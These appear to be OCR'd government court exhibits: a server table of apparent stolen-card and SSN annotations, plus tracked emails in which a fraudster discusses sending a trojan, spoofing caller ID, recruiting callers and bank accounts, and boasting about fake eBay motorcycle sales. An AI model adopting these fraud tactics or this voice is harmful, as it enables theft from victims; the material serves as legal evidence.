| 415 | 0 | | | | | | | | 7 | 0 |
| 416 | 0 | | | | | | | | 0 | 0 |
| 417 | 0 | | | | | | | | 0 | 0 |
| 418 | 0 | | | | | | | | 1 | 0 |
| 419 | 0 | | | | | | | | 6 | 0 |
| 420 | 0 | | | | | | | | 4 | 0 |
| 421 | 0 | minolta | | | | | | | 9 | 0 |
| 422 | 0 | | | | | | | | 4 | 0 |
| 423 | 0 | | | | | | | | 6 | 0 |
| 424 | 0 | | | | | | | | 3 | 0 |
| 425 | 0 | | | | | | | | 7 | 0 |
| 426 | 0 | | | | | | | | 2 | 0 |
| 427 | 0 | | | | | | | | 2 | 0 |
| 428 | 0 | | | | | | | | 1 | 0 |
| 429 | 0 | | | | | | | | 0 | 0 |
| 430 | 0 | | | | | | | | 9 | 0 |
| 431 | 0 | | | | | | | | 3 | 0 |
| 432 | 0 | | | | | | | | 6 | 0 |
| 433 | 0 | | | | | | | | 9 | 0 |
| 434 | 0 | | | | | | | | 6 | 0 |
| 435 | 0 | | | | | | | | 2 | 0 |
| 436 | 0 | | | | | | | | 3 | 0 |
| 437 | 0 | | | | | | | | 1 | 0 |
| 438 | 0 | | | | | | | | 4 | 0 |
| 439 | 0 | | | | | | | | 4 | 0 |
| 440 | 0 | | | | | | | | 4 | 0 |
| 441 | 0 | | | | | | | | 2 | 0 |
| 442 | 0 | | | | | | | | 3 | 0 |
| 443 | 0 | natiune | | | | | | | 5 | 0 |
| 444 | 0 | +yahooHost*2 | | | | | | | 6 | 0 |
| 445 | 0 | raul +privintacc | | | | | | | 0 | 0 |
| 447 | 0 | +amazon are utility bill +yahooHost*7 minolta | | | | | | | 1 | 0 |
| 448 | 0 | minolta / are utility bill | | | | | | | 8 | 0 |
| 449 | 0 | minolta are utility bill  www.mediatemple.net | | | | | | | 4 | 0 |
| 450 | 0 | are utility bill minolta +yahooHost*5 | | | | | | | 3 | 0 |
| 451 | 0 | are utility bill | | | | | | | 6 | 0 |
| 452 | 0 | are utility bill | | | | | | | 4 | 0 |
| 453 | 0 | are utility bill +yahooHost*3 | | | | | | | 3 | 0 |
| 454 | 0 | are utility bill +privateinternetaccess +yahooHost | | | | | | | 8 | 0 |
| 455 | 0 | are utility bill + privateinternetaccess +yahooHost*2 | | | | | | | 0 | 0 |
| 456 | 0 | are utility bill | | | | | | | 4 | 0 |

Gov. Ex. 1204 Pg 7 of 10

Dreamhost - ps373645                                        cc_table

| # | | text | | | |
|---|---|---|---|---|---|
| 457 | 0 | minolta are utility bill www.mediatemple.net | f | 0 | 0 |
| 458 | 0 | minolta are utility bill www.mediatemple.net declined | E | 9 | 0 |
| | | minolta are utility bill | | | |
| 459 | 0 | www.mediatemple.net | v | 9 | 0 |
| 460 | 0 | raul / are utility bill | t | 5 | 0 |
| 461 | 0 | are utility bill -internetprivateaccess | a | 4 | 0 |
| 462 | 0 | are utility bill +yahooHost*3 vps208 | F | 7 | 0 |
| 463 | 0 | are utility bill -internetprivateaccess | F | 7 | 0 |
| 464 | 0 | minolta RR | c | 9 | 0 |
| 465 | 0 | | J | 6 | 0 |
| 466 | 0 | | S | 9 | 0 |
| 467 | 0 | | N | 2 | 0 |
| 468 | 0 | are utility bill | f | 4 | 0 |
| 469 | 0 | | b | 0 | 0 |
| 470 | 0 | | | 8 | 0 |
| 471 | 0 | | g | 8 | 0 |
| 472 | 0 | | c | 4 | 0 |
| 473 | 0 | | y | 4 | 0 |
| 474 | 0 | | F | 6 | 0 |
| 475 | 0 | | h | 9 | 0 |
| 476 | 0 | | e | 5 | 0 |
| 477 | 0 | minolta mediatemple.net | j | 1 | 0 |
| 478 | 0 | minolta | F | 9 | 0 |
| 479 | 0 | | r | 1 | 0 |
| 480 | 0 | bun dar are credit 0 | c | 8 | 0 |
| 481 | 0 | minolta mediatemple.net | h | 7 | 0 |
| 482 | 0 | | J | 5 | 0 |
| 483 | 0 | | E | 0 | 0 |
| 484 | 0 | | c | 0 | 0 |
| 485 | 0 | minolta mediatemple.net verificare | h | 0 | 0 |
| 486 | 0 | | h | 5 | 0 |
| 487 | 0 | | c | 0 | 0 |
| 488 | 0 | minolta mediatemple.net-declined | f | 8 | 0 |
| 489 | 0 | | c | 7 | 0 |
| 490 | 0 | minolta mediatemple.net-declined | E | 7 | 0 |
| 491 | 0 | #NAME? | s | 2 | 0 |
| 492 | 0 | minolta mediatemple.net-declined | h | 9 | 0 |
| 493 | 0 | | h | 5 | 0 |
| 494 | 0 | minolta mediatemple.net-declined +yahooHost | S | 6 | 0 |
| 495 | 0 | minolta  mediatemple.net | h | 6 | 0 |
| 496 | 0 | | g | 0 | 0 |
| 497 | 0 | #NAME? | c | 8 | 0 |
| 498 | 0 | test -privateInternetaccess | L | 2 | 0 |
| 499 | 0 | test +yahooHost*2 | c | 1 | 0 |
| 500 | 0 | test | f | 5 | 0 |
| 501 | 0 | test +privateInternetaccess +yahooHost*2 | c | 4 | 0 |
| 502 | 0 | test | h | 0 | 0 |
| 503 | 0 | test | r | 0 | 0 |
| 504 | 0 | test | c | 5 | 0 |
| 505 | 0 | | J | 3 | 0 |
| 506 | 0 | a acceptato apoil  a refutato pe yah | h | 3 | 0 |
| 507 | 0 | minolta +yahooHost blocat pe yahoo -yahooHost | g | 9 | 0 |
| 508 | 0 | minolta +yahooHost*2 -yahooHost | j | 6 | 0 |
| 509 | 0 | minolta +yahooHost*2 -yahooHost | c | 8 | 0 |
| 510 | 0 | #NAME? | h | 0 | 0 |
| 511 | 1 | #NAME? | s | 9 | 0 |
| 512 | 0 | test | J | 4 | 0 |
| 513 | 0 | wtnx evolce -yahooHost | E | 0 | 0 |
| 514 | 0 | test | h | 7 | 0 |
| 515 | 0 | #NAME? | r | 6 | 0 |
| 516 | 0 | test | t | 0 | 0 |
| 517 | 0 | test | i | 7 | 0 |

Page 8 of 10

Gov. Ex. 1204 Pg 8 of 10

Dreamhost – ps373645

cc_table

| | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 518 | 0 | test •yahooHost*6 | | | | | | | | | -3 | 0 |
| 519 | 0 | test •yahooHost | | | | | | | | | -2 | 0 |
| 520 | 0 | test | | | | | | | | | -9 | 0 |
| 521 | 0 | test •yahooHost*4 | | | | | | | | | -6 | 0 |
| 523 | 1 | #NAME? | | | | | | | | | -8 | 0 |
| 524 | 0 | #NAME? | | | | | | | | | -8 | 0 |
| 526 | 0 | #NAME? | | | | | | | | | -4 | 0 |
| 525 | 0 | #NAME? | | | | | | | | | -2 | 0 |
| 527 | 0 | #NAME? | | | | | | | | | -3 | 0 |
| 528 | 0 | | | | | | | | | | -6 | 0 |
| 529 | 0 | | | | | | | | | | -5 | 0 |
| 530 | 0 | | | | | | | | | | -8 | 0 |
| 531 | 0 | poti folosi cred ca e buna | | | | | | | | | -11 | 0 |
| 532 | 0 | | | | | | | | | | -4 | 0 |
| 534 | 0 | | | | | | | | | | -14 | 0 |
| 533 | 0 | | | | | | | | | | -17 | 0 |
| 535 | 0 | | | | | | | | | | -3 | 0 |
| 536 | 0 | so fi futut2 | | | | | | | | | -18 | 0 |
| 537 | 0 | #NAME? | | | | | | | | | -6 | 0 |
| 538 | 0 | | | | | | | | | | -5 | 0 |
| 539 | 0 | #NAME? | | | | | | | | | -10 | 0 |
| 540 | 0 | #NAME? | | | | | | | | | -3 | 0 |
| 541 | 1 | #NAME? | | | | | | | | | -5 | 0 |
| 542 | 0 | #NAME? | | | | | | | | | -11 | 0 |
| 543 | 0 | #NAME? | | | | | | | | | -9 | 0 |
| 544 | 0 | #NAME? | | | | | | | | | -7 | 0 |
| 545 | 1 | #NAME? | | | | | | | | | -7 | 0 |
| 546 | 1 | #NAME? | | | | | | | | | -8 | 0 |
| 547 | 0 | #NAME? | | | | | | | | | -4 | 0 |
| 548 | 0 | | | | | | | | | | -8 | 0 |
| 549 | 0 | #NAME? | | | | | | | | | -7 | 0 |
| 550 | 0 | #NAME? | | | | | | | | | -17 | 0 |
| 551 | 1 | #NAME? | | | | | | | | | -2 | 0 |
| 552 | 0 | #NAME? | | | | | | | | | -1 | 0 |
| 553 | 1 | #NAME? | | | | | | | | | -8 | 0 |
| 554 | 0 | #NAME? | | | | | | | | | -3 | 0 |
| 555 | 1 | #NAME? | | | | | | | | | -6 | 0 |
| 556 | 0 | #NAME? | | | | | | | | | -12 | 0 |
| 557 | 1 | #NAME? | | | | | | | | | -7 | 0 |
| 558 | 1 | #NAME? | | | | | | | | | -5 | 0 |
| 559 | 0 | #NAME? | | | | | | | | | -7 | 0 |
| 560 | 1 | #NAME? | | | | | | | | | 0 | 0 |
| 561 | 1 | •yahooHosting*2 vultr.com | | | | | | | | | -2 | 1 |
| 562 | 0 | | | | | | | | | | | |
| 563 | 1 | •omnisHosting*2 dream16 | | | | | | | | | | |
| | | •yahooHosting | | | | | | | | | -9 | 0 |
| 564 | 1 | ssn johnson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 | | | | | | | | | -14 | 0 |
| 565 | 1 | •yahooHosting*3 RO gmail | | | | | | | | | -8 | 0 |
| 566 | 0 | | | | | | | | | | -12 | 0 |
| 567 | 0 | #NAME? | | | | | | | | | -5 | 0 |
| 568 | 0 | •yahooHosting ssn magent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 | | | | | | | | | -1 | 0 |
| 569 | 1 | •yahooHosting*3 RO | | | | | | | | | -2 | 0 |
| 570 | 1 | •yahooHosting*2 ssn howze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 | | | | | | | | | -5 | 0 |
| 571 | 0 | #NAME? | | | | | | | | | -7 | 0 |
| 572 | 0 | •yahooHosting*2 omins_nope | | | | | | | | | | |
| | | •yahooHosting ssn Betty Walton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 | | | | | | | | | -8 | 0 |
| 573 | 0 | gmail | | | | | | | | | -8 | 0 |
| 574 | 0 | #NAME? | | | | | | | | | -3 | 0 |
| 575 | 1 | #NAME? | | | | | | | | | -7 | 0 |
| 576 | 1 | •yahooHosting*2 bluehost bcrypt | | | | | | | | | -2 | 0 |
| 577 | 0 | •yahooHosting ssn helen l. edgar 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 | | | | | | | | | | |

Gov. Ex. 1204 Pg 9 of 10

Dreamhost – ps373645

cc_table

| | | | | |
|---|---|---|---|---|
| 578 | 1 | ryahooHosting*2 callfire -bcrypt | | 0 |
| 579 | 1 | #NAME? | | 0 |
| 580 | 1 | ryahooHosting*4 ssn ESTRADA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 callfire twi | | 1 |
| 581 | 0 | #NAME? | | 0 |
| 582 | 0 | #NAME? | | 0 |
| 583 | 0 | ryahooHosting*3 av-cs callfire nope -dream | | 0 |
| 584 | 1 | #NAME? | | 0 |
| 585 | 0 | #NAME? | | 0 |
| 586 | 1 | #NAME? | | 0 |
| 587 | 0 | #NAME? | | 0 |
| 588 | 1 | #NAME? | | 1 |
| 589 | 1 | #NAME? | | 1 |
| 590 | 1 | dream18 | | 1 |
| 591 | 1 | TO TEST!!! | | 0 |
| 592 | 1 | #NAME? | | 1 |



From: **Mailto Blackhole** devnull@srve.com
Subject: Monitor 06/23 13:40.19 UTC
Date: June 23, 2011 at 9:40 AM
To: collectau@gmail.com

06/23 13:40.19 UTC:-

X-Arg1: -M
X-Arg2: fxstd55@yahoo.com
X-Arg3: 76.13.13.45
X-Arg4: dusty99_13760@yahoo.com.readnotify.com
X-Arg: --msgsep--
From fxstd55@yahoo.com Thu Jun 23 07:37:32 2011
Received: from smtp106.prem.mail.ac4.yahoo.com (smtp106.prem.mail.ac4.yahoo.com [76.13.13.45])
    by mail.readnotify.org (8.13.8/8.13.8/CWT/DCE) with SMTP id p5N7bVgT016251
    for <dusty99_13760@yahoo.com.readnotify.com>; Thu, 23 Jun 2011 07:37:31 GMT
Received: (qmail 38332 invoked from network); 23 Jun 2011 07:37:30 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
    s=s1024; d=yahoo.com;
    h=DKIM-Signature:X-Yahoo-Newman-Property:X-YMail-OSG:X-Yahoo-SMTP:Received:Message-ID:References:X-
Mailer:Date:From:To:Subject:Mime-Version:Content-Type;

    b=IulUq+t7CJNY4LaL2mcCVLidnUbAQnymu8ttucQ4K3IbVoHcPhKtRNrHxoZrR0g6sax8/WLCXz9IQReF8m7sN/uJMrOl9TAHbCi0sd5
    yDrRwgwVANkDYDggufwPcWPddkbMBn/bZXHFiSfO6zlmLc7QKW/AZKoNMBeG9VhUbycs=  ;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1308814650;
    bh=15InpntMMyywQJQkBZmn1PQXPtI+sM1vxTYtNEEP4h8=; h=X-Yahoo-Newman-Property:X-YMail-OSG:X-Yahoo-
SMTP:Received:Message-ID:References:X-Mailer:Date:From:To:Subject:Mime-Version:Content-Type;
    b=CKBSJXy70oRUIa5KZVV1+YDIGZnjtFNmt0YciOgPZ/aC50rqSoZ2SYzzgdTxbsKG5Bh3NzEdLxC3smCLBZ5fFpavSD5PXHylhJkB
    QLzHAmaQNy5//tqs/jIZjGCHyX+gXDYTXPCDp7YS56N+95M88FIWBh5Fo1sb6qhFHngTKxI=
X-Yahoo-Newman-Property: ymail-3
X-YMail-OSG: thV.FaUVM1ki.xzqM9vloCBYceMnA3lGfJHHMG8RcRb.aiM
    _ouw4D.BZVHHLfrV0mRbAZ.tPd_6F0SuaoZ4QdmKKE4Ln7JKlRIP87XNobbT
    AruMrpSQLLrtKFpM0_EeYjUF7UqcpJYU2bl8qMhxq5d27mQQXVztN7LEgC3F
    t53O9WbvJjN.dSH1xjNCWWTQuEmEFwdRfT8eCAW0xjB0nr_6jGYSh3t.daXS
    kbltFCoolW_mi8cMxTVdKUtDJsZA7tt1DNfFOhNgl2BpvRkrqR_7kHOzGgPc
    cH9la5oK0_bd4uwrQkGEgjYulWkuIbzS9lSg2UOIKYMg5jqc2IR23FXpJdxU
    1r8UYgY_v.x985m0sAe_HODBIx1_etTyuHvo1IyQ7eLlOyF0qkzJLO5psPh8
    nHRvgO6f7GRPF26tkJIiraRb7_Lf.I4H_7tYDMLdNWPwihQwlP5RumgPNJwE
    FI9I-
X-Yahoo-SMTP: W9EIpJmswBA2US9jYHypFIinNEA-
Received: from jeepers (fxstd55@172.162.251.74 with login)
    by smtp106.prem.mail.ac4.yahoo.com with SMTP; 23 Jun 2011 00:37:26 -0700 PDT
Message-ID: <20110623003730290.005E61BE@plus.smtp.mail.yahoo.com>
References: <674926.5506.qm@web38508.mail.mud.yahoo.com>
    <20110623003618072.005D47A3@plus.smtp.mail.yahoo.com>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Thu, 23 Jun 2011 00:37:30 -0700
From: "fxstd55@yahoo.com" <fxstd55@yahoo.com>
To: dusty99_13760@yahoo.com.readnotify.com
Subject: Re[6]: To: William Leonard 2008 Harley-Davidson Heritage
    Softail
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=====_13088146507870=_"
X-Brightmail-Tracker: AAAAAQAAAUA=

--=====_13088146507870=_
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable

Interesting proposal, having someone to call who has a proper accent could=
be worth something.

Regarding the MC knowledge and stuff, that's really unnecessary though, if=
you give them too much details they keep asking for more eventually will=
want to meet you. You can't comply to their every request. I have some=
items that I actually have knowledge of, and I still play it this way.
Anyway I sent you a trojan, I'm not the fake email kind of guy, this was=
only an attempt for where the trojan didnt work, it's leftovers.=
    Surprisingly out of about 20 of these emails 2 more seem to be willing=
to send LOL.

GOVERNMENT
EXHIBIT
1:16CR224

1324

So yeah, if you're willing to talk on the phone we can make a nice=
partnership. You don't need to be answering the phone, just place the=
calls, from a prepaid card or something. We can even spoof the caller id.

I propose that I give you a  nice % of what we burn together, you can=
always verify if the fucker got burned, simply by calling and asking so I=
have no way to cut you out. And we're like 5 guys doing this, so we'll=
give you plenty of jobs.

Do you have an Instant Messanger account, so we can talk this through?

*********** REPLY SEPARATOR ***********

On 6/22/2011 at 10:00 AM Dusty Leonard wrote:



--- On Wed, 6/22/11, fxstd55@yahoo.com <fxstd55@yahoo.com> wrote:

From: fxstd55@yahoo.com <fxstd55@yahoo.com>
Subject: Re[4]: To: William Leonard 2008 Harley-Davidson Heritage Softail
To: "Dusty Leonard" <dusty00_12768@yahoo.com>
Date: Wednesday, June 22, 2011, 7:18 AM

Well on the contrary, you're the one who has no idea about how this works.

But in any case, I would have an opening for you. We need bank accounts,=
can you handle that?

*********** REPLY SEPARATOR ***********

On 6/22/2011 at 4:01 AM Dusty Leonard wrote:

--- On Tue, 6/21/11, fxstd55@yahoo.com <fxstd55@yahoo.com> wrote:

From: fxstd55@yahoo.com <fxstd55@yahoo.com>
Subject: Re[2]: To: William Leonard 2008 Harley-Davidson Heritage Softail
To: dusty00_16768@yahoo.com
Date: Tuesday, June 21, 2011, 12:32 PM

Could you please give me your ebay username so I can make you a second=
chance offer?

*********** REPLY SEPARATOR ***********

On 6/15/2011 at 3:12 AM Dusty Leonard wrote:

--=====_13088146507870=_
Content-Type: text/html; charset="ISO-8859-1"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3698" name=GENERATOR></HEAD>
<BODY>
<DIV>Interesting proposal, having someone to call who has a proper accent could
be worth something.  </DIV>
<DIV> </DIV>
<DIV>Regarding the MC knowledge and stuff, that's really unnecessary though, if
you give them too much details they keep asking for more eventually will want to
meet you. You can't comply to their every request. I have some items that I
actually have knowledge of, and I still play it this way. </DIV>
<DIV>Anyway I sent you a trojan, I'm not the fake email kind of guy, this was
only an attempt for where the trojan didnt work, it's leftovers.  
Surprisingly out of about 20 of these emails 2 more seem to be willing to send
LOL.</DIV>
<DIV> </DIV>
<DIV>So yeah, if you're willing to talk on the phone we can make a nice
partnership. You don't need to be answering the phone, just place the calls,
from a prepaid card or something. We can even spoof the caller id.</DIV>
<DIV> </DIV>
<DIV>I propose that I give you a  nice % of what we burn together, you can
always verify if the fucker got burned, simply by calling and asking so I have
no way to cut you out. And we're like 5 guys doing this, so we'll give you
plenty of jobs.</DIV>
<DIV> </DIV>
<DIV>Do you have an Instant Messenger account, so we can talk this
through?</DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>*********** REPLY SEPARATOR ***********<BR><BR>On
6/22/2011 at 10:00 AM Dusty Leonard wrote:</FONT></DIV>
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid">
  <TABLE cellSpacing=0 cellPadding=0 border=0>
    <TBODY>
    <TR>
      <TD vAlign=top>
      <DIV>
      ▮▮▮▮▮▮▮▮▮▮</DIV>
      <DIV>
      ▮▮▮▮▮▮▮▮</DIV>
      <DIV>
      ▮▮▮▮▮▮</DIV>
      <DIV>
      ▮▮▮▮▮▮▮</DIV>
      <DIV>
      ▮▮ ▮▮▮▮</DIV>
      <DIV> </DIV>
      <DIV><BR><BR>--- On <B>Wed, 6/22/11, fxstd55@yahoo.com
      <B>&lt;fxstd55@yahoo.com&gt;</b> wrote:</B><BR>
      <BLOCKQUOTE
      style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: rgb(16,16,255) 2px solid"><BR>From:
      fxstd55@yahoo.com &lt;fxstd55@yahoo.com&gt;<BR>Subject: Re[4]: To:
      William Leonard 2008 Harley-Davidson Heritage Softail<BR>To: "Dusty
      Leonard" &lt;dush▮▮_12▮▮@yahoo.com&gt;<BR>Date: Wednesday, June 22,

2011, 7:18 AM<BR><BR>
<DIV id=yiv1543390581>
<DIV>Well on the contrary, you're the one who has no idea about how
this works.</DIV>
<DIV> </DIV>
<DIV>But in any case, I would have an opening for you. We need bank
accounts, can you handle that?</DIV>
<DIV><BR><FONT face=Arial size=2>*********** REPLY SEPARATOR
***********<BR><BR>On 6/22/2011 at 4:01 AM Dusty Leonard
wrote:</FONT></DIV>
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid">
  <TABLE cellSpacing=0 cellPadding=0 border=0>
    <TBODY>
    <TR>
      <TD vAlign=top>
        <DIV>
                                                    </DIV>
        <DIV>So I lets cut thru all the time. 
                      .</DIV>
        <DIV>                                                </DIV>
        <DIV>
                      </DIV>
        <DIV>
                                  </DIV>
        <DIV> </DIV>
        <DIV><BR><BR>--- On <B>Tue, 6/21/11, fxstd55@yahoo.com
<I>&lt;fxstd55@yahoo.com&gt;</I></B> wrote:<BR></DIV>
        <BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: rgb(16,16,255) 2px solid"><BR>From:
        fxstd55@yahoo.com &lt;fxstd55@yahoo.com&gt;<BR>Subject:
        Re[2]: To: William Leonard 2008 Harley-Davidson Heritage
        Softail<BR>To:                        <BR>Date: Tuesday,
        June 21, 2011, 12:32 PM<BR><BR>
        <DIV id=yiv1543390581>
        <DIV>Could you please give me your <STRONG>ebay
        username</STRONG> so I can make you a second chance
        offer?</DIV>
        <DIV><BR><FONT face=Arial size=2>*********** REPLY SEPARATOR
        ***********<BR><BR>On 6/15/2011 at 3:12 AM Dusty Leonard
        wrote:</FONT></DIV>
        <BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid">
          <TABLE cellSpacing=0 cellPadding=0 border=0><A
          rel=nofollow name=mTBODY>
          <TBODY>
          <TR>
            <TD vAlign=top>
              <DIV>                        </DIV>
              <DIV>                        </DIV>
              <DIV> </DIV>
              <DIV>
                                      </DIV>
              <DIV>            .</DIV>
              <DIV> </DIV>
              <DIV><BR><BR><FONT face=Verdana
              size=2></FONT> </DIV></TD></TR></A></TBODY></TABLE></BLOCKQUOTE>
        <DIV><PRE> </PRE><PRE><BR><IMG height=1 alt=""
src="http://www.iuzrg39dcmbr78.readnotify.com/nocache/iuzrg39dcmbr79/footer0.gif" width=3 border=0><IMG height=1 alt="" width=2
border=0>

</PRE><FONT color=#fef1f0>
          <UL
          style="LIST-STYLE-IMAGE: url(http://www.iuzrg39dcmbr7m.ReadNotify.com/lis/iuzrg39dcmbr7q/rspr74.gif); COLOR:
#ffffff">
            <LI></LI></UL></FONT></DIV></DIV></BLOCKQUOTE></TD></TR></TBODY></TABLE></BLOCKQUOTE></DIV>
</BLOCKQUOTE></TD></TR></TBODY></TABLE></BLOCKQUOTE></BODY></HTML>

--======_13088146507870=_--

From: **Mailto Blackhole** devnull@srve.com
Subject: Monitor 07/01 14:07.07 UTC
Date: July 1, 2010 at 10:07 AM
To: collectau@gmail.com



07/01 14:07.07 UTC:-

X-Arg1: -M
X-Arg2: fxstd888@me.com
X-Arg3: 17.148.16.100
X-Arg4: ~~rmorgan_tst@yahoo.com~~.readnotify.com
X-Arg: --msgsep--
From fxstd888@me.com Thu Jul  1 14:06:57 2010
Received: from asmtpout025.mac.com (asmtpout025.mac.com [17.148.16.100])
    by mx.mxsvr.com (8.13.8/8.13.8/CWT/DCE) with ESMTP id o61E6uqG015616
    for <rmorgan_tst@yahoo.com.readnotify.com>; Thu, 1 Jul 2010 14:06:56 GMT
MIME-version: 1.0
Content-type: multipart/alternative;
 boundary="Boundary_(ID_rl+78C3xHXPUr/1PeohmRw)"
Received: from k (AC81F43B.ipt.aol.com [172.129.244.59])
 by asmtp025.mac.com (Sun Java(tm) System Messaging Server 6.3-8.01 (built Dec
 16 2008; 32bit)) with ESMTPA id <0L4V002JKTVEPR90@asmtp025.mac.com> for
 rmorgan_tst@yahoo.com.readnotify.com; Thu, 01 Jul 2010 07:06:56 -0700 (PDT)
X-Proofpoint-Spam-Details: rule=notspam policy=default score=0 spamscore=0
 ipscore=0 phishscore=0 bulkscore=0 adultscore=0 classifier=spam adjust=0
 reason=mlx engine=6.0.2-1004200000 definitions=main-1007010057
X-Proofpoint-Virus-Version: vendor=fsecure
 engine=1.12.8161:2.4.5,1.2.40,4.0.166
 definitions=2010-07-01_02:2010-02-06,2010-07-01,2010-06-30 signatures=0
Message-id: <201007010706520953.00703509@smtp.me.com>
In-reply-to: <941502.45475.qm@web81002.mail.mud.yahoo.com>
References: <941502.45475.qm@web81002.mail.mud.yahoo.com>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Thu, 01 Jul 2010 07:06:52 -0700
From: "fxstd888@me.com" <fxstd888@me.com>
To: rmorgan_tst@yahoo.com.readnotify.com
Subject: Re[6]: 2005 Harley-Davidson Deuce for Sale


--Boundary_(ID_rl+78C3xHXPUr/1PeohmRw)
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable

perhaps there are 3 kinds of americans

1. we got these that I scam. They totally lack common sense and basically=
 they think they're ripping me off, actually... They think I'm stupid and I=
 don't know how much the bike is worth ... and they're the smart ones.=
 Specially I like couples, they're the best (maybe some got divorced coz of=
 this hahaha). some of them figir it out before they end up sending the=
 money, but i'd still put them in this category, since they initially=
 believed that the bike was actually for sale at my price; basically they=
 escape mostly because of some dumb luck, but can't escape forever, there=
 will always be something else they'll fall for eventually.

2. we got the normal people which I'll never know existed since the normal=
 reaction to this, in my opinion, is to simply ignore my auction.

3. then we got the vigillantes. I am totally confused, why are they wasting=
 their time with me? maybe because their time is not worth all that much,=
 is it? they're clearly not making any profit out of this, and probably=
 not making any profit out of anything, they just CAN'T. but they do have=
 some psychological problems, they need to see a shrink instead (which will=
 take their money too, just like me). i'm probably their worst nightmare,=
 they threaten, file complaints, and I just laugh at them, coz they cant=
 shut me down before I scam EVERYONE that is scammable, just like when it=
 first happened to them. their goal is probably to feel superior, like cops=
 do, kinda the same kind. ...hell, they're not even cops, cops laugh at=
 them too (so that they feel superior, remember?). cops simply are guys=
 that wanted to be "bad guys" but they never made it, they didn't have what=
 it takes. so they got their job now to feel more comfortable with--

GOVERNMENT
EXHIBIT
1:16CR224

1325

it takes, so they got their job now to feel more comfortable with=
themselfes. but when they encounter me they must feel awful, suddenly they=
realize their true nature, they realize they CAN'T be me, and will NEVER=
be, they'll just keep being the loosers, trying to impress idiots by=
holding their hands in the dark; and they'll NEVER defeat me, such a=
shame... at least they feel good when the #1 category worships them...=
thats sooo fuckin low :) whahahahaha .

so fuck you too!

btw, do you even have a clue on how much money i'm making?

why don't you get a life? ever had one? i find it seriously doubtful.

*********** REPLY SEPARATOR ***********

On 6/29/2010 at 5:20 PM Rick Morgan wrote:

████████████████████████████████████████

--- On Tue, 6/29/10, fxstd888@me.com <fxstd888@me.com> wrote:

From: fxstd888@me.com <fxstd888@me.com>
Subject: Re[4]: 2005 Harley-Davidson Deuce for Sale
To: "Rick Morgan" <rmorgan_tot@yahoo.com>
Date: Tuesday, June 29, 2010, 5:04 PM

Are you getting my emails??

Item# is 220626828376, you can search for it on eBay
or you can use this link:
http://cgi.ebay.com/ebaymotors/ws/eBayISAPI.dll?ViewItem&item=3D220626828376=

Buy it now price: $7,600.00

--Boundary_(ID_rI+78C3xHXPUr/1PeohmRw)
Content-type: text/html; charset=ISO-8859-1
Content-transfer-encoding: 7BIT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.6001.18702"></HEAD>
<BODY>
<DIV><FONT size=2 face=Arial><FONT face=Verdana>perhaps there are 3 kinds
of americans</FONT>
<DIV> </DIV>
<DIV><FONT face=Verdana>1. we got these that I scam. They totally lack common
sense and basically they think they're ripping me off, actually... They think
I'm stupid and I don't know how much the bike is worth ... and they're the smart
ones. Specially I like couples, they're the best (maybe some got divorced coz of
this hahaha). </FONT><FONT face=Verdana>some of them figir it out before they
end up sending the money, but i'd still put them in this category, since they
initially believed that the bike was actually for sale at my price; basically
they escape mostly because of some dumb luck, but can't escape forever, there
will always be something else they'll fall for eventually.</FONT></DIV>
<DIV><FONT face=Verdana></FONT> </DIV>
<DIV><FONT face=Verdana>2. we got the normal people which I'll never know
existed since the normal reaction to this, in my opinion, is to simply ignore my
auction.</FONT></DIV>
<DIV><FONT face=Verdana></FONT> </DIV>
<DIV><FONT face=Verdana>3. then we got the vigillantes. I am totally confused,
why are they wasting their time with me? maybe because their time is not
worth all that much, is it? they're clearly not making any profit out of this,
and probably not making any profit out of anything, they just CAN'T. but they
do have some psychological problems, they need to see a shrink instead (which
will take their money too, just like me). i'm probably their worst nightmare,
they threaten, file complaints, and I just laugh at them. coz they cant shut me

they structure, the complaints, and I just laugh at them, cuz they calm that me

down before I scam EVERYONE that is scammable, just like when it first
happened to them. their goal is probably to feel superior, like cops do,
kinda the same kind. ...hell, they're not even cops, cops laugh at them too (so
that they feel superior, remember?). cops simply are guys that wanted to be "bad
guys" but they never made it, they didn't have what it takes, so they got
their job now to feel more confortable with themselfes. but when they encounter
me they must feel awful, suddenly they realize their true nature, they realize
they CAN'T be me, and will NEVER be, they'll just keep being the loosers, trying
to impress idiots by holding their hands in the dark; and they'll NEVER defeat
me, such a shame... at least they feel good when the #1 category
worships them... thats sooo fuckin low :) whahahahaha . </FONT></DIV>
<DIV><FONT face=Verdana></FONT> </DIV>
<DIV><FONT face=Verdana>so fuck you tool</FONT></DIV>
<DIV><FONT face=Verdana></FONT> </DIV>
<DIV><FONT face=Verdana>btw, do you even have a clue on how much money I'm
making?</FONT></DIV>
<DIV><FONT face=Verdana></FONT> </DIV>
<DIV><FONT face=Verdana>why don't you get a life? ever had one? i find it
seriously doubtful.</FONT></DIV></FONT></DIV><BR><FONT size=2
face=Arial>*********** REPLY SEPARATOR ***********<BR><BR>On 6/29/2010 at 5:20
PM Rick Morgan wrote:</FONT>
<BLOCKQUOTE
